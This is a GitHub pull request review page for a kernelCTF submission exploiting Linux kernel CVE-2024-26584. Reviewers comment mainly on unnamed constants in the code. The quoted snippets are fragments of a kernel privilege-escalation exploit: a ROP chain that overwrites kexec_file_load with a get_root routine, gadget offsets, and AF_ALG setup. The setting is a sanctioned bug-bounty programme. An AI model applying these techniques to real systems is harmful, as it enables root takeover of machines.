kernelCTF: add CVE-2024-26584_lts_cos#298
kernelCTF: add CVE-2024-26584_lts_cos#298lambdasprocket wants to merge 1 commit intogoogle:masterfrom
Conversation
koczkatamas
added
the
kCTF: vuln OK
|
|
||
| static char *g_sh_argv[] = {"sh", NULL}; | ||
|
|
||
| static int g_status; |
There was a problem hiding this comment.
Unused global variable g_status. Remove the global variable and pass NULL to waitpid if the status is not needed.
| "push %r12\n" | ||
| "push %rbx\n" | ||
| "push %rbp\n" | ||
| "lea -0x18fb41(%rip), %r15\n" |
There was a problem hiding this comment.
Magic offset -0x18fb41 used in inline assembly. Add a comment explaining it.
Check the 'Name and/or comment numeric constants' section of the style guide.
| { | ||
| uint64_t *rop2_start = rop2; | ||
|
|
||
| rop_patch_kernel_code(&rop2, kaddr(SYS_KEXEC_FILE_LOAD), (uint64_t) get_root, 0x200); |
There was a problem hiding this comment.
Magic number 0x200 used for patch size. Define the patch size as a named constant.
See the 'Name and/or comment numeric constants' section of the style guide.
| rop_patch_kernel_code(&rop2, kaddr(SYS_KEXEC_FILE_LOAD), (uint64_t) get_root, 0x200); | ||
|
|
||
| *rop2++ = kaddr(POP_RDI); | ||
| *rop2++ = 10000000; |
There was a problem hiding this comment.
Magic number 10000000 used for sleep duration. Define the sleep duration as a named constant or add a comment.
Check the 'Name and/or comment numeric constants' section of the style guide.
| struct cmsghdr *cmsg; | ||
| struct af_alg_iv *iv; | ||
| struct iovec iov; | ||
| char cbuf[CMSG_SPACE(4) + CMSG_SPACE(20)] = {0}; |
There was a problem hiding this comment.
Magic numbers 4 and 20 used for control message sizes. Define the sizes as named constants.
See the 'Name and/or comment numeric constants' section of the style guide.
| if (g_rop2_len > ROP2_CONST_OFFSET) | ||
| err(1, "Stage 2 ROP size too big: %d > %d\n", g_rop2_len, ROP2_CONST_OFFSET); | ||
|
|
||
| char *backlog = g_mmapped_buf + 0x7e0; |
There was a problem hiding this comment.
Magic offset 0x7d8. Define the offset as a named constant or add a comment.
See the 'Name and/or comment numeric constants' section of the style guide.
| 0xffffffff81ed2b63: mov rdx, r15 | ||
| 0xffffffff81ed2b66: call __x86_indirect_thunk_r8 | ||
| */ | ||
| *(uint64_t *) (backlog + 0x10) = kaddr(G1); |
There was a problem hiding this comment.
Magic offset 0x10. Define the offset as a named constant or add a comment.
Check the 'Name and/or comment numeric constants' section of the style guide.
| 0xffffffff81ed2b66: call __x86_indirect_thunk_r8 | ||
| */ | ||
| *(uint64_t *) (backlog + 0x10) = kaddr(G1); | ||
| *(uint64_t *) (backlog + 0xc8) = kaddr(PUSH_RSI_JMP_QWORD_RSI_66); |
There was a problem hiding this comment.
Magic offset 0xc8. Define the offset as a named constant or add a comment.
See the 'Name and/or comment numeric constants' section of the style guide.
| */ | ||
| *(uint64_t *) (backlog + 0x10) = kaddr(G1); | ||
| *(uint64_t *) (backlog + 0xc8) = kaddr(PUSH_RSI_JMP_QWORD_RSI_66); | ||
| *(uint64_t *) (backlog + 0x66) = kaddr(POP_RSP); |
There was a problem hiding this comment.
Magic offset 0x66. Define the offset as a named constant or add a comment.
See the 'Name and/or comment numeric constants' section of the style guide.
| syscall(__NR_kexec_file_load); | ||
|
|
||
| after_pwn(); | ||
|
|
There was a problem hiding this comment.
Uncommented sleep() call. Add a comment explaining why the sleep is necessary.
See the 'Sleeping & waiting' section of the style guide.
|
@lambdasprocket Thanks for the great submission! Please review, fix or answer comments so that we could proceed with merging the PR. |
3 participants
No description provided.